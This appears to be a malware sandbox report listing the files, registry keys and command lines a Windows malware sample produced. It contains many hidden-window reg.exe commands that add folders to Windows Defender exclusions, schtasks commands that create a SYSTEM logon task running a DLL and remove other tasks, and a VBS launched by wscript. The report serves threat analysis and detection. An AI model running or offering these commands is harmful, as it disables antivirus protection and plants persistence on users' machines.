Technical Information
- <SYSTEM32>\tasks\gjnfbdwha
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aVlQuiEOU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\cRHunKoNTIE' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\sIXMRvRtOmUn' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\gpONkMBmPnKIKHVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\BzogYFlOwXble' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\UVrNbaZbhgrdC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XmryStnxtZkU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\CqgKpIrHPZQDrFFU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\TTBPjMxBgHvGknSQj' = '00000000'
- %WINDIR%\temp\cqgkpirhpzqdrffu\jrhkwdcgzxejbgzn.vbs
- %WINDIR%\temp\cqgkpirhpzqdrffu\jrhkwdcgzxejbgzn.vbs
- <SYSTEM32>\tasks\gjnfbdwha
- %PROGRAMDATA%\ntuser.pol
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\CqgKpIrHPZQDrFFU\jrHKWdCgZXEJBgZN.vbs"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wMUPrTBFsNolKieCh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "weYOQYrXJtEViiwJW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "weYOQYrXJtEViiwJW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "weYOQYrXJtEViiwJW"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "weYOQYrXJtEViiwJW"
- '<SYSTEM32>\taskeng.exe' {BFE8580A-4166-443E-A95E-3EA05D51F6BE} S-1-5-21-1960123792-2022915161-3775307078-1001:arudjdx\user:Interactive:[1]
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gjnFBdwhA"
- '%WINDIR%\syswow64\schtasks.exe' /run /tn "gjnFBdwhA"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gjnFBdwhA" /SC once /ST 00:05:20 /F /RU "user" /TR "cmd.exe /c start /min gpupdate.exe /force /target:computer"
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\TTBPjMxBgHvGknSQj" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wMUPrTBFsNolKieCh"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wMUPrTBFsNolKieCh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wMUPrTBFsNolKieCh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ibSCmdpveRdJbAIsfkf"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sxUIfhIdgMVQN"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sxUIfhIdgMVQN"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jnetkgFFTGgWcc"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "jnetkgFFTGgWcc"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iAwPBcappHKwkKJ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iAwPBcappHKwkKJ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iAwPBcappHKwkKJ"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\aVlQuiEOU\kZiQgW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XgrLFQlVJERwHRR" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iAwPBcappHKwkKJ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zLwmGpWeVXANGlwPyyh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zLwmGpWeVXANGlwPyyh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zLwmGpWeVXANGlwPyyh"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zLwmGpWeVXANGlwPyyh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ibSCmdpveRdJbAIsfkf2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ibSCmdpveRdJbAIsfkf2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ibSCmdpveRdJbAIsfkf"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sxUIfhIdgMVQN2"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\BzogYFlOwXble" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\UVrNbaZbhgrdC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C mkdir "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" && copy nul "%WINDIR%\Temp\CqgKpIrHPZQDrFFU\jrHKWdCgZXEJBgZN.vbs"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\CqgKpIrHPZQDrFFU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XmryStnxtZkU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\sIXMRvRtOmUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jlelieCksRzKVBrfJyR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32
